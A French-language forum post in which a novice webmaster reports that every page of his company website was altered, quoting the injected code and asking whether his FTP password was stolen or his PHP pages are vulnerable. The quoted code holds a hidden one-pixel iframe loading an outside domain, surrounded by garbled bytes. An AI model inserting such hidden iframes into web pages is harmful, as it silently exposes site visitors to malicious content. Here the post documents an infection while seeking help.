probleme de hacking ou virus
bonjour a tous , voila je me retourne vers vous cer je vien d'avoir un probleme avec mes pages web , je ne suis pa un webmaster confirmé et je commence juste prendre la releve de la mise a jour du site web de ma boite , mai voila que dernierement tout les bad de page de mon site on été rajouté avec ce type de code
Code:
1 2 3 4
|
""""K®'§v\ž®º+¥¨N©i×bž hv+nWŒH,~¸žÙrzºè®–*y8^¥§]Šx-¡Ø¬i¹^1"±úâzweÉê뢺Zäáz–v)ඇb±¦åxĈÇë‰éÝ—'«®Šéj
<iframe src="http://lovelifecash.com/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>
†Ù¥…æ¶+e{7ŠÛ‰×^Ÿûb¶W¿…æn‡rn(–Šð†+^qéíz¸uãMÅ¢¶âu×§þqéíz¸kqéíz¹àŠ|Óvýǧµêÿn‡rþf•8^¥§]Šx-¡Ø¬i¹^1"±úâzweÉêëf¢"""" |
alors je met pose plusieur questions est ce que je me suis fait hacké , quelqu'un a til découvert mes passe ftp et modifié toutes mes pages ?
yarait t'il des faille dans certaine de mes pages php ?
si quelqu'un pouvait m'aiguillez merci , mon site est www.7afm.com si vous voulez jetez un oeil , merci
jai deja remplacé toute les pages "infecté" car en local mes pages sont tout a fait bien , mais je préfererai que ce genre d'incident ne se reproduise pas !!!
merci a vous